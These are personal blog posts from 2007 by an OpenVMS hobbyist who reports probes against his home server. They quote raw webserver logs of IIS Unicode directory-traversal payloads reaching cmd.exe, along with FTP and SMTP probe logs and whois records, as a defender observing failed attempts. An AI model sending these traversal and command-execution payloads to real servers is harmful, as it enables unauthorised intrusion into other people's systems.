Posted on

One more day of (mail) bombing

On yesterday’s post, I mentioned some server trying to deliver something – blocked because the address cannot be translated to a domain – one verey wto minutes or so.
Well, it did continue until this – being the last post:

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable to a host name

Operator.log is over 4 times the usual size. I guess 4 times, since Persepone – the personal Alpha on Demeter – was added to the cluster yesterday – over Wireless – what Alpha could do that! – and that added some extra lines as well.

Posted on

Who says Windows is secure….

Though surely just a script and a lot of attempts to hack into a windows system, this is what I found in last week’s webserver log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
Clearly someone who’s running a script, and I severely doubt his knowlegde…..Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS

Apart from this, just a few that appear quite regularly:

69.84.207.37 – – [12/Feb/2007:07:02:35 +0100] “GET /No%0Ate-email.htm HTTP/1.1” 403 864
69.84.207.37 – – [12/Feb/2007:07:06:27 +0100] “GET /cgi-bin/count.exe HTTP/1.1” 502 900
69.84.207.37 – – [12/Feb/2007:07:06:28 +0100] “GET /cgi-bin/c%0Aount.exe HTTP/1.1” 404 887
207.234.131.90 – – [12/Feb/2007:09:56:37 +0100] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1” 400 893

These are just a few of these, not a lot in a week.
Mail
Someone is trying to blow the SMTP server – for over 24 hours up to now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

I haven’t count the entries, but the attempts occur each 2 minutes or so. Alas, the router has no ability to block him there…
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered

Both ISP’s will be informed.

Posted on

19-Feb-2007

Quiet on all fronts
that is: nothing but the usual to be done. I still have to process the FTP logs, but it will be part of the full overhaul of the whole site. I think I’ll use another program as a portal, another PHP-based program including forums (Phorum, as used by OpenVMS.org, is currently under investigation) of perhaps even domething I create myself.
Stay tuned….
Windows woes
The problems with updates on Aphrodite have not been solved. Thou the system states that updates are actuallay installed, some show up time after time again and need to be manually hidden to show up. I’m not sure Microsoft is really investigating….
PHP woes
Once in a while, the PHP engine breaks and the server will complain it doesn’t get a valid response. This applies to both the blog and forums, message like this occur in the webserver logs:
%HTTPD-W-NOTICED, 17-FEB-2007 16:34:52, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 213.84.186.159
-NOTICED-I-URI, GET (66 bytes) /forums/login.php?logout=true&sid=4e53a23d769172fb7e0d205a5106e3ac
-NOTICED-I-SCRIPT, /forums/login.php forums:[000000]login.php (cgi_exe:phpwasd.exe) FORUMS:[000000]login.php
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (129 bytes) %SYSTEM-F-HPARITH, high performance arithmetic trap, Imask=00000000, Fmask=00000002, summary=02, PC=00000000001E9C94, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:708/0 net:708/0
I found the

    only

solution seems to be; restart the webbrowser…

Posted on

Some keep trying

Just one tried to get into the anonymous area yesterday – this is what OPERATOR.LOG tells:
%%%%%%%%%%% OPCOM 13-FEB-2007 04:15:37.63 %%%%%%%%%%%
Message from user TCPIP$FTP on DIANA
User Name: anonymous
Source: p548C9062.dip0.t-ipconnect.de
Status: NOPRIV -- File access violation
Object: WEB_DISK2:[public.anonymous.070213041515p]


It has been a long time since I saw these messages. Checking the looging of anonymous FTP, there have been some atempts but it’s all very, very quiet here. However, for some reason the logfiles do not show up in the operator desk, so that’s something to look into.
The oldest – after the link from the main page has been removed – goes back to 13-Nov-2006, and once in a while, once or wtice a month, someone comes along to try to host some files. But the area is set to be read_only so that is bound to fail. Since most don’t have a clue what they’re doing, they try to access “standard” files. That is: standrad for Linix or Windows, or some packages.

13-FEB-2007 04:15:36.20 User:anonymous logged in ident:Agpuser@home.com from Host:p548C9062.dip0.t-ipconnect.de
13-FEB-2007 04:15:37.54 User:anonymous ident:Agpuser@home.com status:00010001 CWD dir:WEB_DISK2:[public.anonymous]
13-FEB-2007 04:15:39.24 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]tagged
13-FEB-2007 04:15:39.32 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Tagged
13-FEB-2007 04:15:39.40 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]TaGGeD
13-FEB-2007 04:15:39.48 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]data
13-FEB-2007 04:15:39.57 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Data
13-FEB-2007 04:15:39.65 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]^%
13-FEB-2007 04:15:39.74 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$SCRATCH^:
13-FEB-2007 04:15:39.82 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]T^^^@gged
13-FEB-2007 04:15:39.90 User:anonymous ident:Agpuser@home.com logged out

The same is observered on web access, at some times. The latest proof from last week’s log:

219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /thisdoesnotexistahaha.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:29 +0100] "GET /cacti/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cacti/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:31 +0100] "GET /stats/cmd.php HTTP/1.1" 302 360

but some will drop their attempt directly:
213.247.43.35 - - [11/Feb/2007:07:25:24 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

Posted on

06-Feb-2007

One more Alpha
That is: more or less.
To be installed on Demeter – the company laptop: PersonalApha. Not a big fast box but just for getting along without the real world at hand. That means: I can do all what I ever want to do on my laptop, exchanging files between that VMS box and any on the network.
The stuff can be downloaded – free of charge – form EmulatorsInternational. Hit the download link and save the file. Also download mkimage.com from the utilities download page of Software Resources International (get the Communicationa and Utilities manual from there as well) to create copies of your VMS installtion CD(s).